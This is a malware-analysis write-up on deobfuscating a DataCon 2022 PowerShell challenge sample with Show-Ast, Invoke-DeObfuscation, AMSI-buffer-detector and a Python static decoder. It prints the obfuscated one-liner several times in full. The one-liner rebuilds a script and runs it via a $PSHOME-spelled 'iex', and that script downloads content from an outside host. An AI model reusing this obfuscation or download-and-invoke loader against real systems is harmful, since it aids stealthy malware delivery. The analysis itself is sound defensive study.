datacon2022: sign-in challenge sample, tool-assisted analysis

Outline

Original sample. The trailing `& ( $pShomE[21]+$psHOmE[30]+'x')` indexes characters out of `$PSHOME` (by default `C:\Windows\System32\WindowsPowerShell\v1.0`, where index 21 is `i` and index 30 is `e`) to spell `iex`, so whatever the pipeline rebuilds is handed straight to Invoke-Expression:

```powershell
-joIn('36b105;112v32Y61v32M34R49R34F10v36%105;112v32R43o61k32Y34M48F46R50;34%10v36M105M112M32;43o61;32%34;51k49R46;50%51o34o10R36b105R112%32M43v61b32o34o46v51k52M34M10Y36k109F97o108v119%97F114b101;32%61R32k40F78%101;119M45b79R98;106o101M99M116v32v83b121Y115;116F101R109b46M78o101v116k46M87F101R98R67%108R105Y101M110b116F41F46M68R111R119%110%108M111M97R100R83Y116F114k105F110M103%40;34M104F116Y116k112b58v47o47o36%105F112R47o102M97o107R101;117R114;108o34R41'.SpLiT('RMk;vbFoY%') |FOrEAch{ ([Char] [int] $_) })|& ( $pShomE[21]+$psHOmE[30]+'x')
```

01 Using Show-Ast

Show-Ast renders the PowerShell AST of a script as a graphical tree, which makes the sample's structure (a string literal, a `.SpLiT()` call, a `ForEach` cast block and a final invocation) visible regardless of the mixed-case spelling of the cmdlets.

Show the AST of a script or script module:

```powershell
Show-Ast $pshome\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1
Show-Ast ~\Documents\WindowsPowerShell\profile.ps1
```

Show the AST of a script block:

```powershell
Show-Ast { echo -InputObject "Name is $name" }
```

Result:
![[../图片/Pasted image 20230329112755.png]]

02 Using Invoke-DeObfuscation

```powershell
Import-Module ./Invoke-DeObfuscation.psd1
DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1
```

Result:

```text
PS C:\Users\Lsz\Documents\BaiduSyncdisk\PowerShell反混淆与分类\解混淆\invoke-deobfuscation\Code> Import-Module .\Invoke-DeObfuscation.psd1

PS C:\Users\Lsz\Documents\BaiduSyncdisk\PowerShell反混淆与分类\解混淆\invoke-deobfuscation\Code> DeObfuscatedMain -ScriptPath0 ../Data/demo02.ps1
-joIn('36b105;112v32Y61v32M34R49R34F10v36%105;112v32R43o61k32Y34M48F46R50;34%10v36M105M112M32;43o61;32%34;51k49R46;50%51o34o10R36b105R112%32M43v61b32o34o46v51k52M34M10Y36k109F97o108v119%97F114b101;32%61R32k40F78%101;119M45b79R98;106o101M99M116v32v83b121Y115;116F101R109b46M78o101v116k46M87F101R98R67%108R105Y101M110b116F41F46M68R111R119%110%108M111M97R100R83Y116F114k105F110M103%40;34M104F116Y116k112b58v47o47o36%105F112R47o102M97o107R101;117R114;108o34R41'.SpLiT('RMk;vbFoY%') |FOrEAch{ ([Char] [int] $_) })|& ( $pShomE[21]+$psHOmE[30]+'x')
```

The tool hands the one-liner back unchanged: none of its layers (the character-set `SpLiT`, the `[Char] [int]` cast, the `$PSHOME`-indexed `iex`) are resolved, so purely static deobfuscation yields nothing on this sample.

03 Using AMSI-buffer-detector

Result:

```powershell
$ip = "1"
$ip += "0.2"
$ip +="31.23"
$ip += ".34"
$malware = (New-Object System.Net.WebClient).DownloadString("http://$ip/fakeurl")
```

This is the plaintext that reaches Invoke-Expression: AMSI is handed the script content at that point, after the `SpLiT`/`[Char]` pipeline has already rebuilt it, so the obfuscation only protects the sample at rest. With `$ip` assembled piecewise to `10.231.23.34`, the sample's only action is to fetch `http://10.231.23.34/fakeurl` into `$malware`; nothing further is done with the result in the captured script.
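The same plaintext can be recovered without running the sample at all. The following Python decoder is an added example (it is not part of the write-up and not code from Show-Ast, Invoke-DeObfuscation or AMSI-buffer-detector). It mirrors the sample's own pipeline: .NET `String.Split(string)` splits on every character of its argument, each piece is cast to a char, and the invoked command is spelled from the default `$PSHOME`. The regex-driven reconstruction of `$var = "..."`/`$var += "..."` assignments and of `$var` references inside URLs is an assumption that covers only the simple pattern seen in this sample, not general PowerShell string semantics.

```python
"""Static decoder for the sample's obfuscation: ASCII codes glued together with a
random delimiter set, Split on those delimiters, cast to [char], joined and fed
to an "iex" spelled out of $PSHOME characters. Added example, not part of the
write-up's tooling. It never executes the sample."""
import re

# Default Windows PowerShell 5.1 install directory. The sample indexes into
# $PSHOME to spell its final command, so the decoder needs the same string.
DEFAULT_PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# Copy of the one-liner from the write-up above (input data, not new code).
SAMPLE = "-joIn('36b105;112v32Y61v32M34R49R34F10v36%105;112v32R43o61k32Y34M48F46R50;34%10v36M105M112M32;43o61;32%34;51k49R46;50%51o34o10R36b105R112%32M43v61b32o34o46v51k52M34M10Y36k109F97o108v119%97F114b101;32%61R32k40F78%101;119M45b79R98;106o101M99M116v32v83b121Y115;116F101R109b46M78o101v116k46M87F101R98R67%108R105Y101M110b116F41F46M68R111R119%110%108M111M97R100R83Y116F114k105F110M103%40;34M104F116Y116k112b58v47o47o36%105F112R47o102M97o107R101;117R114;108o34R41'.SpLiT('RMk;vbFoY%') |FOrEAch{ ([Char] [int] $_) })|& ( $pShomE[21]+$psHOmE[30]+'x')"


def split_chars_decode(encoded: str, delims: str) -> str:
    """Mirror  '<encoded>'.Split('<delims>') | ForEach { [char][int]$_ }.

    .NET String.Split(string) splits on *each character* of its argument, not on
    the argument as a whole, which is why a random-looking delimiter set works."""
    pieces = re.split("[" + re.escape(delims) + "]", encoded)
    # PowerShell would coerce an empty piece (two adjacent delimiters) to [int]0,
    # i.e. a NUL character; drop those instead of keeping the noise.
    return "".join(chr(int(p)) for p in pieces if p)


def resolve_pshome_indices(expr: str, pshome: str = DEFAULT_PSHOME) -> str:
    """Evaluate a concatenation of $pshome[N] characters and single-quoted literals
    such as  $pShomE[21]+$psHOmE[30]+'x'  (variable name matched case-insensitively)."""
    parts = []
    for m in re.finditer(r"\$pshome\[(\d+)\]|'([^']*)'", expr, re.IGNORECASE):
        parts.append(pshome[int(m.group(1))] if m.group(1) is not None else m.group(2))
    return "".join(parts)


def decode_sample(script: str) -> dict:
    """Pull the encoded literal, delimiter set and invoked command out of the one-liner."""
    m = re.search(r"'([^']*)'\.split\('([^']*)'\)", script, re.IGNORECASE)
    if m is None:
        raise ValueError("no '<literal>'.Split('<delims>') pattern found")
    payload = split_chars_decode(m.group(1), m.group(2))
    inv = re.search(r"&\s*\(([^)]*)\)", script)  # the  & ( ... )  call operator
    command = resolve_pshome_indices(inv.group(1)) if inv else None
    return {"command": command, "payload": payload}


def rebuild_string_vars(payload: str) -> dict:
    """Follow  $name = "..."  and  $name += "..."  lines to recover split-up strings
    (assumption: only this simple pattern is handled, enough for the sample)."""
    values = {}
    for line in payload.splitlines():
        m = re.match(r'\s*\$(\w+)\s*(\+?=)\s*"([^"]*)"\s*$', line)
        if m:
            name, op, text = m.groups()
            values[name] = (values.get(name, "") + text) if op == "+=" else text
    return values


def extract_urls(payload: str) -> list:
    """Return double-quoted http(s) URLs with $variables expanded from the payload's
    own assignments, giving the resolved network IOC."""
    values = rebuild_string_vars(payload)
    urls = re.findall(r'"(https?://[^"]+)"', payload)
    return [re.sub(r"\$(\w+)", lambda v: values.get(v.group(1), v.group(0)), u)
            for u in urls]


if __name__ == "__main__":
    result = decode_sample(SAMPLE)
    print("invoked via:", result["command"])   # iex
    print(result["payload"])
    print("IOCs:", extract_urls(result["payload"]))
```

Running it prints the same five-line script that AMSI-buffer-detector captured, plus `iex` as the resolved invocation and `http://10.231.23.34/fakeurl` as the reassembled download URL. Splitting on a character set rather than a fixed delimiter is the detail that Invoke-DeObfuscation did not resolve here, so it is worth handling explicitly in any hand-written decoder.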